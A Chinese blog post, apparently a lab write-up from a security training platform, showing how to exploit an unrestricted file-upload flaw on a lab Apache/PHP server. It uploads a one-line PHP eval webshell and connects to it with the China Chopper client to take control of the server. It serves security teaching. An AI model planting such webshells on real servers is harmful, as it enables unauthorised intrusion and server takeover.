一个实验了解文件上传漏洞利用

声明

本次实验环境来源深信服产业教育平台

仅供学习交流使用,请勿用于非法用途,违者一律自行承担所有风险

 

实验目的

通过本实验,掌握文件上传的过程以及文件上传漏洞的利用,理解文件上传的利用条件和漏洞危害。

 

实验环境

操作机:Win10

靶机:Apache + PHP(192.168.21.8)

实验地址:http://ip/up/2/up.html

 

实验原理

上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp、aspx、jsp、php等)

造成文件上传漏洞的成因(比较复杂)有:

Web应用开放了文件上传功能,并且对上传的文件没有进行足够的限制

程序开发部署的时候,没有考虑到系统特性和过滤不严格

通过其他漏洞绕过限制

实验步骤

1、登录操作机,打开浏览器,输入实验地址:http://[靶机IP地址]/up/2/up.html

ebbd9e92846742138f10ea8d5f5109d7.png

2、在操作机上准备要上传的文件(脚本文件),比如新建info.php文件

<?php
phpinfo();
?>

43f58f64444f4143ae6d4db292f8f6a1.png

3、点击“选择文件”按钮,选中要上传的文件

9d560a87f8744a6b95331c3ba27b42e7.png

4、点击“submit”按钮,上传info.php文件

6de9a291adda404db7e6d36f9b34e498.png 

5、输入http://ip/up/2/upload/info.php,访问上传的info.php脚本文件,查看脚本文件nfo.php文件可以成功上传并解析 

 57afe84d538c4940ad5b3018a371db75.png

6、在操作机上新建muma.php的一句话木马文件

<?php
@eval($_POST['cmd'])>
?>

b22204af452644098e190b14a7c043d0.png

7、上传一句话木马文件

59d3a5efe21c4e6aaf79e8fb078e822c.png

8、打开桌面tools文件夹的“中国菜刀(过狗)”,双击exe文件 

9d76afe57109405280f9146afb4c70d6.png

9、在空白处鼠标右击,点击“添加”,添加shell地址

地址为:一句话木马地址和连接密码

脚本类型:PHP

24ffbcc2ec1f4925a4f1d995d573fc8e.png

10、点击“添加”,双击一句话木马地址b55fe32c382c4e158bc9beaa46c1957c.png 

11、浏览器服务器,对任意文件进行操作,可以上传、下载等,成功上传后门文件,服务器沦陷

e84ddebda20a4827ac6d7d29d234ff57.png

实验总结

掌握文件上传的过程和文件上传漏洞的利用过程,利用文件上传漏洞上传木马脚本,通过WebShell工具连接后门,拿下网站服务器,理解文件上传的危害。

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值